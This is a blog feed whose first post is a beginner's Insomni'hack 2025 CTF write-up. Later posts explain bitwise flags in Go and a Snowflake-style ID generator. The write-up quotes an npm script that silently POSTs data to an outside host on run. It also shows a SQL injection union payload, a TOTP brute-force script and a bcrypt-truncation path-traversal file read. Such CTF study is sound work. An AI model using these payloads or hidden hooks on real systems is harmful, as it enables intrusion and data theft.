DEV Community: Krypton

💀 Insomni'hack 2025 CTF write-up

Krypton — Mon, 17 Mar 2025 19:44:08 +0000

The Insomni'hack 2025 CTF is a CTF hosted during the Insomni'hack conference in Lausanne, Switzerland. You had to register yourself so that you can attend to the on-site CTF. As a beginner in CTFs I decided to mostly take the easy challenges. The CTF was from March 14 (5pm UTC) to March 15 (4am UTC) 2025.

Compared to last year I was able to solve less challenges, I missed the opportunity to solve two challenges due to my lack of concentration at 2am

I mostly took part to the CTF because I was there, I know my level in CTFs is not that good as I lack of practice.. Looking back at it, I managed to only solve the easy challenges with tow of them the next day due to being a bit tired (I guess?). It makes me definitely want to improve, hence why I will try to get more into the CTFs - maybe Space Heroes will run a CTF this year...?

Welcome To Insomni'hack

This challenge was pretty straightforward. There was a repository to clone and we were supposed to run the npm run serve command after cloning it.

Considering the welcome challenge of last year, I did not wanted to run that npm run command, as I knew it would likely do some funny stuff. Looking at the package.json file, this confirmed by supposition:

{
  "name": "insomnihack-grid",
  "version": "1.0.0",
  "description": "Interactive grid game for Insomnihack",
  "main": "index.js",
  "scripts": {
    "serve": "wget --quiet --method POST --header 'Content-Type: application/json' --body-data '{\"tata\":\"shame_W3XeaSn$QMEcvgu6!!\"}' -O - https://sound.insomnihack.ch:1337/shame && lite-server --baseDir=\"src\" && lite-server --baseDir=\"src\"",
    "build": "mkdir -p dist && cp -r src/* dist/"
  },
  "keywords": ["insomnihack", "grid", "game"],
  "author": "Your Name",
  "license": "MIT",
  "devDependencies": {
    "lite-server": "^2.6.1"
  }
}

As it can be seen, it would execute the following command

wget --quiet --method POST --header 'Content-Type: application/json' --body-data '{"tata":"shame_W3XeaSn$QMEcvgu6!!"}' -O - https://sound.insomnihack.ch:1337/shame && lite-server --baseDir="src" && lite-server --baseDir="src"

To be fair I did not see the shame_W3XeaSn$QMEcvgu6!! JSON data at the beginning, so I've completely skipped it and moved to the src/script.js file that was available. There I cleaned up the file to only focus on more relevant data, again I did not search for flag in the file.

The resulting cleaned up script flag resulted in the following:

// Grid Configuration
// [REMOVED]

function calculateGridDimensions() {
  // [REMOVED]
}

// Progress Tracking
// [REMOVED]

function createGridCell() {
  // [REMOVED]
}

function handleGridClick() {
  // [REMOVED]
}

function updateProgress(numberIndex) {
  // [REMOVED]
}

function updateTotalProgress() {
  // [REMOVED]
}

function showCompletion() {
    // Create completion overlay
    const overlay = document.createElement('div');
    overlay.className = 'completion-overlay';

    // Create completion container
    const completionContainer = document.createElement('div');
    completionContainer.className = 'completion-logo';

    // Create COMPLETED text
    const completedText = document.createElement('span');
    completedText.className = 'completion-text';
    completedText.textContent = 'COMPLETED';

     const flagContainer = document.createElement('div');
    flagContainer.className = 'completion-flag-container';

    // Create flag
    const flag = document.createElement('div');
    flag.className = 'completion-flag';

    // Encoded flag
    const decode = (str) => {
        return decodeURIComponent(escape(atob(str)));
    };

    const encodedFlag = "SU5Te1czbENvTTNfVDBfMW5zMG1uaWg0Y0tfMjAyNSEhfQ==";
    flag.textContent = decode(encodedFlag);

    // Assemble the elements
    flagContainer.appendChild(flag);
    completionContainer.appendChild(completedText);
    completionContainer.appendChild(flagContainer);
    overlay.appendChild(completionContainer);
    document.body.appendChild(overlay);
}


function initializeGrid() {
  // [REMOVED]
}

// Event Listeners
// [REMOVED]

// Hover Effect
// [REMOVED]

// Resize handler with debounce
// [REMOVED]

// Initial grid creation
// [REMOVED]

In that resulting code, the following line can be seen:

const encodedFlag = "SU5Te1czbENvTTNfVDBfMW5zMG1uaWg0Y0tfMjAyNSEhfQ==";

This looks like base64, decoding it will result in INS{W3lCoM3_T0_1ns0mnih4cK_2025!!}.

v0l4til3

We were given a quite big 20250312.mem file. Looking at the name of the challenge and the size of the file, it was clear it was required to use volatility.

I've ran the windows.info command against the file and got the following result:

~/CTF/INS25/v0l4til3
🕙 23:33:35 venv ❯ vol -f 20250312.mem windows.info
Volatility 3 Framework 2.11.0
Progress:  100.00       PDB scanning finished
Variable    Value

Kernel Base 0xf80299800000
DTB 0x1aa000
Is64Bit True
IsPAE   False
layer_name  0 WindowsIntel32e
memory_layer    1 FileLayer
KdVersionBlock  0xf8029a60a7c0
Major/Minor 15.26100
MachineType 34404
KeNumberProcessors  2
SystemTime  2025-03-12 18:43:14+00:00
NtSystemRoot    C:\WINDOWS
NtProductType   NtProductWinNt
NtMajorVersion  10
NtMinorVersion  0
PE MajorOperatingSystemVersion  10
PE MinorOperatingSystemVersion  0
PE Machine  34404
PE TimeDateStamp    Wed Aug 29 17:06:46 2085

The challenge description mentioned that the flag was the hash of the flag_user. Running the windows.hashdump command against the file resulted in the following:

User	rid	lmhash	nthash
Administrator	500	aad3b435b51404eeaad3b435b51404ee	e02bc503339d51f71d913c245d35b50b
Guest	501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount	503	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount	504	aad3b435b51404eeaad3b435b51404ee	6f1c4ae67632ca364e7d105de442e569
flag_user	1001	aad3b435b51404eeaad3b435b51404ee	3fa7a000465823e4976000ac1ca9f2d1

Putting the hash in the INS{} flag format resulted in the flag: INS{3fa7a000465823e4976000ac1ca9f2d1}.

ℹ️ It may be worth mentioning that it took me more time to get volatility running... I ended up having to clone the repository and install from the repository directly, otherwise some dependencies were always missing, even though I was manually installing them.

Crack the gate

This challenge was presented in a form of a website; unfortunately I didn't take any pictures of the website as I mainly was using Burp Suite.

We were also given the source code of the app. Before looking at the source code I've seen the login page, so decided to try a simple SQL injection, which failed due to characters being invalid. So I then decided to look at the source code.

Looking at the code, it revealed the /search endpoint with a query parameter to send along. Looking at the source, it was clear this was where the SQL injection was:

@app.route("/search", methods=["GET"])
def search():
    allowed_IPs = request.headers.get("Allowed-IPs", "")
    whitelisted_ip = "localhost"
    if whitelisted_ip in allowed_IPs:
        query = request.args.get("query", "")
        if '"' in query or '*' in query:
            flash("Invalid characters detected in the search query.", "danger")
            return render_template("search.html")
        results = []
        if query:
            conn = sqlite3.connect("db/database.db")
            cursor = conn.cursor()

             # SQL injection below
            sql = f"SELECT * FROM items WHERE item_name LIKE '%{query}%'"

            cursor.execute(sql)
            results = cursor.fetchall()
            conn.close()
        return render_template("search.html", results=results)
    else:
        return render_template("403.html"), 403

There also was a check for the Allowed-IPs header being localhost, so the request made with Burp Suite also had to contain that header.

So I requested the endpoint with the following query:

' OR 1=1 UNION SELECT username,password,password FROM users; --

There was no need to dump the tables/columns names, as they were to be seen in the code for the /login endpoint:

query = "SELECT * FROM users WHERE username = ? AND password = ?"
cursor.execute(query, (username, password))

The request resulted in the following result:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Search</title>
</head>
<body>
    <h1>Search Items</h1>
    <form method="get" action="/search">
        <input type="text" name="query" placeholder="Search for items..." required>
        <button type="submit">Search</button>
    </form>
    <h2>Search Results:</h2>
        <ul>
            <li><b>Item:</b> Laptop <br><b>Description:</b> A powerful gaming laptop.</li>
            <!-- Many more items... -->
            <li><b>Item:</b> admin <br><b>Description:</b> f!hLRXozzFhP3hM?</li>
        </ul>
</body>
</html>

The password seemed unhashed, as it isn't in a common hashing algorithm format. After logging in with admin:f!hLRXozzFhP3hM?, a MFA page is shown.

I've seen that a JWT was added to the storage, so I decided to tamper it to contain "mfa_verified":true instead; without success as the token was signed and checked.

Looking at the code, I've seen this weird line:

totp = pyotp.TOTP(TOTP_SECRET, digits=4, interval=240)

It was explicitly overwriting the default 6 digits and 30 seconds valid OTP time. So this made me directly think, bruteforce! Wrote a quick script to bruteforce the submission of the token with the previous, valid, JWT.

import requests

cookies = {
    "session": "eyJhdXRoZW50aWNhdGVkIjp0cnVlLCJtZmFfdmVyaWZpZWQiOmZhbHNlfQ.Z9SoeQ.d2e8568uF_fMeCTfppxK64eGO8w"
}

for n in range(10000):
    totp_code = str(n).zfill(4)
    print(f"Trying TOTP Code {totp_code}")
    r = requests.post(
        "https://crackthegate.insomnihack.ch/mfa",
        cookies=cookies,
        data={"totp_code": totp_code},
    )
    if "Enter TOTP Code:" not in r.text:
        print(r.text)
        break

After some time I got a valid TOTP code and the page showed the flag: INS{auth_bypassed_4dm1n}.

EG101

ℹ️ This was a crypto challenge that I actually solved at around 2am, but the result being that "obvious" made me think I was wrong and I did not bother converting the data returned from hex to text...

Note to myself: Keep going, even when it seems too "simple"...

When connecting to the given host and port, we are welcomed with text like the following:

P = 9359920040557521287640188225332795304009466497049561443299088499643424200245588313061025165619294040667209797774612400137263138479335798194382908649492031, g = 3384066920714075626041222632115897899444517401444095957347004384777304561656691330065281612933459609521435296935887334868529742606809787303668660304308405
I'm Bob, I want the flag, here's g^x (mod p): 9276512785211037679173774447116113570690592352483125544287802724428191311103080319635189268810074958440535195114282820003326005815844057492966567318565496

After looking at the source code, the flag is converted to hexadecimal and multiplied by K, where

K = (gx)^y \mod p

gx = int(message.split(" ")[-1].strip())
# Alice now have g^x (mod p) from Bob, she will fist compute g^y (mod p), then K = (g^x)^y (mod p)
y = random.randint(2, PRIME - 2)
gy = mod_exp(g, y, PRIME)
K = mod_exp(gx, y, PRIME)

message = msg_to_int("INS{NOT_THE_REAL_FLAG}")
Km = (message * K) % PRIME
send_msg(f"I'm Alice, here's g^y (mod p): {gy} , here's Km (mod p): {Km}\n", client_socket)

The data we can give will be gx, considering 1^x is alays equals to $1$, if we send $1$, we get a resulting Km to be flag * 1, so we get the plain flag.

Sending 1 gave the following back:

I'm Alice, here's g^y (mod p): ..., here's Km (mod p): 27427016322199114720750856505491100766666527541905277

Then just convert 27427016322199114720750856505491100766666527541905277 to hex (494E537B4E4F545F5448455F5245414C5F464C41477D) and then to ASCII, which will result in the flag: INS{NOT_THE_REAL_FLAG}.

Hawkta

ℹ️ After reading this challenge at around 2:30am, I decided to move on and go to sleep. After waking up the next day I realized how "obvious" this challenge was.

There is a website with four links to various hawk pictures. The endpoints are the following:

<a href="/?file=assets/data/img/cooper-s-hawk-profile-583855629-d89e191a88d1484db08800f067ba98e8.jpg&hash=$2a$12$NmPFGriPq4VEFdx7y4XKde67/DFQgQVk/Cz.HxGWi0PV3aSk/JT12">Hawk1</a>
<a href="/?file=assets/data/img/harris_hawk_web.jpg&hash=$2a$12$hPNstQ8F.EBu8z2/EDaXROPakN5L/hix0SUQQG6I6RPu/BcvSBDmC">Hawk2</a>
<a href="/?file=assets/data/img/Hawk-146809760-612x612.jpg&hash=$2a$12$dp0lDL1FuN6irg2LB7j.EOFKte1313GSgz5DpBeTAtBY4gyCMd4KS">Hawk3</a>
<a href="/?file=assets/data/img/Hawk-534214314-612x612.jpg&hash=$2a$12$5zq3d97d5wg1vUvoquZOA.JAeM1.778eWnDgSx/ymj9v1D8d4kLEC">Hawk4</a>
<a href="/?file=assets/data/img/Red-shouldered_Hawk_Buteo_lineatus_-_Blue_Cypress_Lake_Florida.jpg&hash=$2a$12$qsfcrstGdzpRVDNH5Dq//uSK6/Z6ZSBCca7fIeoyRBBdgQk8q3rX6">Hawk5</a>

There is a file and hash parameter sent along with the request, looking at the given source code, they are hard-coded:

// Authorized images are matched to their bcrypt hash values for maximum security
$AUTHORIZED_IMGS = [
    '$2a$12$NmPFGriPq4VEFdx7y4XKde67/DFQgQVk/Cz.HxGWi0PV3aSk/JT12' => 'assets/data/img/cooper-s-hawk-profile-583855629-d89e191a88d1484db08800f067ba98e8.jpg',
    '$2a$12$qsfcrstGdzpRVDNH5Dq//uSK6/Z6ZSBCca7fIeoyRBBdgQk8q3rX6' => 'assets/data/img/Red-shouldered_Hawk_Buteo_lineatus_-_Blue_Cypress_Lake_Florida.jpg',
    '$2a$12$hPNstQ8F.EBu8z2/EDaXROPakN5L/hix0SUQQG6I6RPu/BcvSBDmC' => 'assets/data/img/harris_hawk_web.jpg',
    '$2a$12$dp0lDL1FuN6irg2LB7j.EOFKte1313GSgz5DpBeTAtBY4gyCMd4KS' => 'assets/data/img/Hawk-146809760-612x612.jpg',
    '$2a$12$5zq3d97d5wg1vUvoquZOA.JAeM1.778eWnDgSx/ymj9v1D8d4kLEC' => 'assets/data/img/Hawk-534214314-612x612.jpg', 
    //'$2a$12$v5UW4B3/j6F5vymG0tRDx.iSz7RFlrVlH3Om3zC3QfqiG.InCuKMW' => 'flag.txt'
];

When doing a request, the parameters are checked against the values of the $AUTHORIZED_IMGS variable.

// Check if the file is authorized and the hash is valid
if (isset($AUTHORIZED_IMGS[$provided_hash]) && password_verify($file_name, $provided_hash)) {
    header("Content-Type: image/png");
    echo readfile($file_name); // Clear LFI vulnerability
    exit();
}

The LFI vulnerability was quite clear to me, I still tried to execute a request with hash=$2a$12$v5UW4B3/j6F5vymG0tRDx.iSz7RFlrVlH3Om3zC3QfqiG.InCuKMW and file=flag.txt; this failed.

One thing to note with bcrypt is that it only cares about the first 72 bytes. So using password_verify with the hash being, for example, the hash of 72 times A and the plaintext to verify against being 72 times A and then anything you want, will always return 1 (so valid). Example:

<?php

// 72 times A
$password = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$hashed = password_hash($password, PASSWORD_DEFAULT);

$plaintext = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HELLO WORLD!";
echo password_verify($plaintext, $hashed); // 1

?>

So we can take this at our advantage, looking at the file names there are two that are over 72 characters long:

assets/data/img/cooper-s-hawk-profile-583855629-d89e191a88d1484db08800f067ba98e8.jpg
assets/data/img/Red-shouldered_Hawk_Buteo_lineatus_-_Blue_Cypress_Lake_Florida.jpg

We can take one of them, pass the hash=<hash> and append ../../../../../flag.txt to the file parameter to get the content of the flag.txt file. My browser not liking having to render an image as some weird test, I had to use Burp Suite:

HTTP/1.1 200 OK
Host: localhost
Date: Sat, 15 Mar 2025 09:44:06 GMT
Connection: close
X-Powered-By: PHP/8.2.28
Content-Type: image/png

INS{NOT_THE_REAL_FLAG}
23

🚩 Bitwise flags are amazing, and you should use them

Krypton — Sat, 21 Jan 2023 13:56:35 +0000

Original post

If you are making a web application with users management, bitwise flags will be really useful for that same application. I've never used bitwise flags in my past small web application, and I definitely regret not having used them before... Not only it's super convenient, but you also don't need tons of rows in your database to store various account information. I'm using bitwise flags in Project Absence as well, hence this blog post explaining how it works!

PS: This will most likely be my last blog post focused on software engineering, I will focus more on cyber security in the future, as this was the main goal of my blog when I created it...

Operators Refresh

Before jumping into what bitwise flags are and how to use them, it's needed to get to know the three operators that will be used.

`OR` Operator

The OR - I will also use | - is a basic operator that you most likely have already used while coding. Here's a small refresh on the result of an OR operation:

A	B	A OR B
0	0	0
0	1	1
1	0	1
1	1	1

`AND` Operator

Similar to the OR operator, the AND - I will also use & - operator is a basic operator you most likely have already used. Here's the table as well:

A	B	A AND B
0	0	0
0	1	0
1	0	0
1	1	1

Left Shift Operator

The left shift - I will also use << - operator is an operator you may have not used yet. For bitwise flags it is one of the base that is needed to make it working. Let's take a look at how it works, it's really easy.

Let's take as example 1 << 4:

We first write down 1 as binary, which is obviously 0000 0001
We then move that entire binary number by 4 to the left, so we are left with 0001 0000

Easy, right...? Here's a different way of showing it off:

0000 0001 << 4:
1. 0000 0010
2. 0000 0100
3. 0000 1000
4. 0001 0000

So 1 << 4 is equals to 16. Yes, we can definitely write that down, though it gets more readable to use left shifts once you're dealing with big numbers such as 1 << 23 as you may not know that 8388608 actually represents this...

How do bitwise flags work?

All those operators are very wonderful, but what are actually bitwise flags...?

Well, very simple. It's a way to have many ON/OFF toggles in a single number. Let's quickly show that off with an example, you will also see how the OR and left shift operators will be used.

package main

import "fmt"

// Set some user account flags
const (
    EMAIL_VERIFIED = 1 << 0
    ACCOUNT_BANNED = 1 << 1
)

// Create the Account structure
type Account struct {
    Username string
    Email    string
    Flags    int // Here there will be all account flags, e.g. whether the account is currently banned
}

// We create the function to check if the account is banned
func (a *Account) IsBanned() bool {
    return (a.Flags & ACCOUNT_BANNED) == ACCOUNT_BANNED
}

Now the, maybe, big question: "How does this even work???"

Check if flag exists

Well, checking if a flag is existent is very simple. Considering we always use 1 << X, when performing the left shift we will always and only move a binary 1 around. Then checking for a flag is as simple as using the AND operator. Let's suppose the user's account Flags field is 18.

18              =>              0001 0010
ACCOUNT_BANNED  => 1 << 1 =>    0000 0010

0001 0010
0000 0010 AND
-------------
0000 0010       -> This is equals to ACCOUNT_BANNED

Hopefully with that example above you now understand why (a.Flags & ACCOUNT_BANNED) == ACCOUNT_BANNED can be used to check if a flag is existing.

Creating the `a.Flags` value

To create the value that will be needed to be stored in a.Flags is also very simple. Let's suppose our account is both verified and banned, our flag will need to contain both of these values.

EMAIL_VERIFIED  => 1 << 0 =>    0000 0001
ACCOUNT_BANNED  => 1 << 1 =>    0000 0010

0000 0001
0000 0010 OR
------------
0000 0011

Now you most likely understand why the pattern is using 1 and not some other number in 1 << X, other numbers may overwrite other flags. Now we convert 0000 0011 to decimal and we get 3 - that is the value for a.Flags. We can always add new flags with newValue = oldValue | flag.

Why and where to use bitwise flags?

Now I understand that the explanation above is not the best, I may edit the post based on comments to clarify some things if needed - but maybe with some examples when bitwise flags may be useful, you may understand it better.

Roles

Without bitwise flags

Let's suppose you need roles in your web application, totally understandable. How would you do it?

Maybe an ENUM field in your database if an account can only have one role. But what if it can have more than one? Maybe create a table roles that looks like the following:

user_id	administrator	moderator	member
1337	1	1	1
7331	0	1	1
7337	0	0	1

You get where this is going... Horrible table with just a row per role, yikes.

With bitwise flags

With bitwise flags, you just need a single row roles in your user's table :) Then you assign for every role a left shift operation:

const (
    ADMINISTRATOR = 1 << 0
    MODERATOR     = 1 << 1
    MEMBER        = 1 << 2
)

After that use the techniques above to create the value for roles, for the user 7331 for example: roles = MODERATOR | MEMBER. Then we can check if a user is an administrator with something like that:

func (u *User) IsAdministrator() bool {
    return (u.Roles & ADMINISTRATOR) == ADMINISTRATOR
}

Same goes for other account flags as shown above, to know if an account has the email verified or if they are banned.

Permissions

Same as roles, if you need different users to have permissions on different functionalities of your web application, it may be totally worth it using bitwise flags.

Remove unnecessary functions

Now this one may not be the biggest strength of bitwise flags, but it can definitely be used to optimize some functions in your code. Yes, functions.

Without bitwise flags

Let's imagine we want to print some information about a human:

package main

import "fmt"

type Human struct {
    Firstname string
    Lastname  string
    Username  string
    Email     string
    Age       int
}

func (h *Human) PrintData() {
    fmt.Println("Firstname:", h.Firstname, "Lastname:", h.Lastname, "Username:", h.Username, "Email:", h.Email, "Age:", h.Age)
}

func main() {
    myHuman := &Human{
        Firstname: "John",
        Lastname:  "Doe",
        Username:  "jdoe",
        Email:     "john@doe.com",
        Age:       1337, // Yes that human it quite old...
    }
    myHuman.PrintData()
}

Now this works, as we get the expected output. But what if we want to print a single field? What if you don't want to print all of the fields? Well, yes you can do the following for all of your fields

func (h *Human) PrintFirstname() {
    fmt.Println("Firstname:", h.Firstname)
}

But here again, what if you want only 3 of them? Well, you can replace Println to Print and call the 3 functions to print those fields. But cool kids use bitwise flags 🎉

With bitwise flags

Here again, assign each field a left shift operation and we copy the structure of above:

package main

import "fmt"

type Human struct {
    Firstname string
    Lastname  string
    Username  string
    Email     string
    Age       int
}

const (
    FIRSTNAME = 1 << 0
    LASTNAME  = 1 << 1
    USERNAME  = 1 << 2
    EMAIL     = 1 << 3
    AGE       = 1 << 4
)

And now we can create the function needed to print each field, depending on the parameter - the flags - we give to the function.

func (h *Human) PrintDataWithFlag(flags int) {
    // The " " at the end is just to make sure it looks good when printing multiple things
    if (flags & FIRSTNAME) == FIRSTNAME {
        fmt.Print("Firstname: ", h.Firstname, " ")
    }
    if (flags & LASTNAME) == LASTNAME {
        fmt.Print("Lastname: ", h.Lastname, " ")
    }
    if (flags & USERNAME) == USERNAME {
        fmt.Print("Username: ", h.Username, " ")
    }
    if (flags & EMAIL) == EMAIL {
        fmt.Print("Email: ", h.Email, " ")
    }
    if (flags & AGE) == AGE {
        fmt.Print("Age: ", h.Age, " ")
    }
}

Now what if we want to just print the Firstname, the Email and the Age fields? Very simple:

func main() {
    myHuman := &Human{
        Firstname: "John",
        Lastname:  "Doe",
        Username:  "jdoe",
        Email:     "john@doe.com",
        Age:       1337, // Yes that human it quite old...
    }
    myHuman.PrintDataWithFlag(FIRSTNAME | EMAIL | AGE)
}

Now we have a clean way of printing all the 3 fields, without calling a different function 3 times. You can see the full code here.

Conclusion

If you've mangaged to read and understand all the way down until here and haven't given up on my poor explanation, congrats! Bitwise flags are somewhat complicated for newcomers but also easy once you understood the basics of it and where/how to use them. I personally use bitwise fields for roles and account flags in Project Absence. I don't really like having multiple rows in my datbase just to store such information, I'd rather have a single fields row.

⛄️ Generating unique IDs with the Snowflake algorithm

Krypton — Tue, 08 Nov 2022 16:56:48 +0000

Original post

Unique IDs are pretty much used everywhere and in every application. They are used to identify a user, a product, a transaction, a session, etc. That way we can, for example, assign a transaction made to a specific user, and not by mistake another one. In this article, I'll show you how I generate unique IDs in my applications and give them a second usage as well.

How to get unique IDs?

There are several ways of getting a unique ID per user. Obviously some people probably do stuff like

const min = 1000000
const max = 9999999999

const id = Math.floor(Math.random()*max) + min;

Though I don't really recommend that as it is obviously not really unique. You can, and will, end up with twice the same ID generated. Of course you can check in the database if that ID already exists and generate a new one if it's the case, but you get my point 🤷‍♂️

Auto incrementing integer

Although this is a very basic and widely used method, I'd rather not use this. An example on how this looks like in a database would be something close to that:

id	username	password	created_at
1	john	some_hash	1667329399
2	jane	some_hash	1667329404
3	jack	some_hash	1667329412

Here we can clearly see the IDs incrementing every time one by one.

UUID

UUIDs are a very common way of getting a unique ID. They are 128-bit numbers that are unique. UUIDs are very useful because they are unique, yes there is a tiny chance you can get the same ID generated twice, and they are not sequential. They are also very easy to generate. We can, for example, generate one via the terminal using the following command:

~
🕙 20:07:00 ❯ uuidgen
67DB31FB-1887-4372-A8B0-E87C092D7D11

As you have expected, this UUID will take space in your database but that doesn't really matter that much, your database ends up looking like that when you use UUIDs:

id	username	password	created_at
45915234-74BE-499A-B7D5-D6D4882DA5B7	john	some_hash	1667329399
885A26B8-C7CA-4C84-A871-0E89AF4997BD	jane	some_hash	1667329404
689E682B-35C8-4594-A0D7-5893626B7B1D	jack	some_hash	1667329412

Now let me introduce to you Spaceflake, a distributed generator to create unique IDs with ease; inspired by Twitter's Snowflake

What is a Spaceflake?

A Spaceflake is very simple, it's an ID based on the Snowflake algorithm of Twitter, which they are actively using, and it is slightly edited to fit my needs. The algorithm is pretty simple:

The structure of a Spaceflake

As you can see, a Spaceflake is composed of 4 main parts:

Timestamp: The timestamp is the milliseconds elapsed since the base epoch, it is not necessarily the Unix epoch, when the ID was generated.
Node ID: The node ID represents the ID of the node that generated the Spaceflake. It is a number between 0 and 31.
Worker ID: The worker ID represents the ID of the worker that generated the Spaceflake. It is a number between 0 and 31.
Sequence: The sequence is the number of Spaceflakes generated by the worker on the node. It is a number between 0 and 4095.

With these specifications of the algorithm, we can theoretically generate up to 4 million unique IDs per millisecond 🎉

Workers & Nodes = Spaceflake Network

A Spaceflake Network is a very basic concept where you have multiple independent nodes that themselves consist of multiple workers. These workers are the ones that can generate Spaceflakes.

Ideally a Spaceflake Network represents your entire application, or company. Each node represents a single service/server or application within the company, and each worker represents a single process which can generate a Spaceflake for a specific purpose. This way you can easily identify where a Spaceflake was generated by looking at its node ID and worker ID.

A Spaceflake Network

In the example above we can can consider Node 1 as being the API/backend of your application. The Worker (ID: 1) would be responsible for generating Spaceflakes for user IDs. The Worker (ID: 2) would be responsible for generating Spaceflakes for blog post IDs. That way we can easily identify where a Spaceflake was generated and for what purpose.
Then we also have the Node 2 which may be the logging system of your entire infrastructure, and the IDs generated would be generated by the Worker (ID: 1).

In the end you are free to use them as you wish, just make sure you use these nodes and workers to be able to identify the Spaceflake - which is also the idea behind it.

Why did I create Spaceflakes?

Now you may ask me

"Why on Earth did you create this???"

As a matter of facts lots of people have already asked me this...

To explain my decision, let's go back to the example of the database above with UUIDs. I intentionally added a created_at field in the database as it is very useful to know when a user, or a post, was created. With Spaceflakes, and Snowflakes, you have the creation time of the ID built-in ((spaceflake >> 22) + BASE_EPOCH), so you don't need to store it separately in a new column of your database. This is very useful as it removes unnecessary columns, and it also makes it easier to sort your data by creation time. Your database would then look like that:

id	username	password	~~created_at~~
1037425364332843009	john	some_hash	~~1667329399~~
1037425458566270978	jane	some_hash	~~1667329404~~
1037425546889924611	jack	some_hash	~~1667329412~~

Another reason is that I use Go (duh) for all my different backends, and I wanted to implement my own way of generating unique IDs that are just like Snowflakes. The goal was to make it as easy as possible to use, and to be able to use it in any project I am working on, such as Project Absence, or any other future projects.

Some issues I've faced during development

Go is fast

Gotta GO fast (ba dum tss)

Yes, Go is fast; this was also my first issue. The reason behind that is that at first I made the sequence random, which was definitely not the best idea - though I've kept it in case I want to use it one day. The issue is that, as you've guessed, the sequence is from 0 to 4095, which means that it can only generate 4096 unique IDs per millisecond. This is not a lot, and it is definitely not enough to make sure to have a unique ID for each Spaceflake generated within a millisecond. So I had to change it to be incremental.

Incremental is not enough for bulk generation

So let's suppose someone wants to migrate their database to use Spaceflakes instead of UUIDs. They would have to generate a lot of Spaceflakes, and they would have to do it as fast as possible. This is where the issue comes in. If you generate a Spaceflake every millisecond, you can only generate 4096 Spaceflakes per millisecond. This is, once again, not a lot. So I had to make the node ID and the worker ID incremental as well when using the BulkGenerate() function.
The code is a bit madness, but it's working (at least I think so).

// BulkGenerate will generate the amount of Spaceflakes specified and auto scale the node and worker IDs
func BulkGenerate(s BulkGeneratorSettings) ([]*Spaceflake, error) {
    node := NewNode(1)
    worker := node.NewWorker()
    worker.BaseEpoch = s.BaseEpoch
    spaceflakes := make([]*Spaceflake, s.Amount)
    for i := 1; i <= s.Amount; i++ {
        if i%(MAX12BITS*MAX5BITS*MAX5BITS) == 0 { // When the total amount of Spaceflakes generated is the maximum per millisecond, such as 3'935'295
            time.Sleep(1 * time.Millisecond) // We need to sleep to make sure the timestamp is different
            newNode := NewNode(1) // We set the node ID to 1
            newWorker := newNode.NewWorker() // And we create a new worker
            newWorker.BaseEpoch = s.BaseEpoch
            node = newNode
            worker = newWorker
        } else if len(node.workers)%MAX5BITS == 0 && i%(MAX5BITS*MAX12BITS) == 0 { // When the node ID is at its maximum value
            newNode := NewNode(node.ID + 1) // We need to create a new node
            newWorker := newNode.NewWorker() // And a new worker
            newWorker.BaseEpoch = s.BaseEpoch
            node = newNode
            worker = newWorker
        } else if i%MAX12BITS == 0 { // When the worker ID is at its maximum value
            newWorker := worker.Node.NewWorker() // We just create a new worker
            newWorker.BaseEpoch = s.BaseEpoch
            worker = newWorker
        }
        spaceflake, err := generateSpaceflakeOnNodeAndWorker(worker, worker.Node) // We generate the Spaceflake on the node and worker specified
        if err != nil {
            return nil, err
        }
        spaceflakes[i-1] = spaceflake // i starts at 1, so we need to subtract 1 to get the correct index
    }
    return spaceflakes, nil
}

Source

Now we can make a bulk generation of up to 3'935'295 Spaceflakes per millisecond, which is a lot more than 4096 without auto scaling. Once we hit that maximal amount, we need to sleep for 1 millisecond to make sure the timestamp is different, and we need to create a new node and a new worker.

That is another problem solved 🍿

Spaceflakes are big numbers

Last but not least, I learned that big numbers are pain if not handled as string within an API.
This was exactly what happened to me when using Spaceflakes for one of my API; I generated a Spaceflake - 144328692659220481 - and made an endpoint to get the user ID. When making a GET request to the endpoint with a browser, I got the following json:

{
    "id": 144328692659220480
}

Yes yes, there is a small difference - it's right here: 14432869265922048*0. Now this may be a small difference, but **it is a difference* and we do not want that. The only solution is to make the API return the ID as a string. On the client side, we can then convert it to a number if we want to - for example by using this:

spaceflakeID := "144328692659220481" // Will be the value returned by the API
id, _ := strconv.ParseUint(spaceflakeID, 10, 64)
sequence := spaceflake.ParseSequence(id)

This will then return the correct sequence of the Spaceflake.

How to use Spaceflakes?

Using Spaceflakes is super simple, if you have a Go project, you can just download the package with

go get github.com/kkrypt0nn/spaceflake

And then you can use it in your project by importing it and generate a Spaceflake:

package main

import (
    "fmt"

    "github.com/kkrypt0nn/spaceflake"
)

func main() {
    node := spaceflake.NewNode(5)
    worker := node.NewWorker() // If BaseEpoch not changed, it will use the EPOCH constant
    sf, err := worker.GenerateSpaceflake()
    if err != nil {
        panic(err)
    }
    fmt.Println(sf.Decompose()) // map[id:<Spaceflake> nodeID:5 sequence:1 time:<timestamp> workerID:1]
}

Source

There are other examples you can check out in the examples folder of the repository.

🚀 Space Heroes 2022 CTF write-up

Krypton — Mon, 04 Apr 2022 17:34:00 +0000

Original post

The Space Heroes 2022 CTF was an online CTF from April 1st (4pm UTC) to April 3rd (9pm UTC) 2022. It was hosted by FITSEC and it even was their first time organizing such an event! Lots of applause to them for their hard work 👏 As a newbie CTF player, there were lots of challenges to have fun on and to successfully solve. This of course will improve my experience with CTFs and get me even more motivated to do more. The entire CTF was space themed, which made me even more motivated since I love space :D
I've solved much more challenges compared to the Insomni'hack 2022 CTF, one reason is that there was more time; and also that some challenges were much more easier. This was an overall awesome CTF, especially for me as a newbie. I've learned a lot and hope to participate in their future CTFs!
As always, all flags had the same format which was shctf{...}. Let's get right into the write-up:

🆗 k?

This was a warm up challenge. The description said:

MEE6 was busted! Help us out and unlock the flag in #mee6...

So here it's pretty obvious, let's head over to #mee6 on their Discord server and see what we can try out. When using the /help commands commaannd, you can see a list of custom commands made by the Discord server administrators. There was a command that looked interesting: !k (optional text) - An awesome command!.
When typing !k you will get the flag sent in your private messages by the bot: k? shctf{WhY_iS_K_BaNnEd} 😭. Free points for that one!

💬 Discord

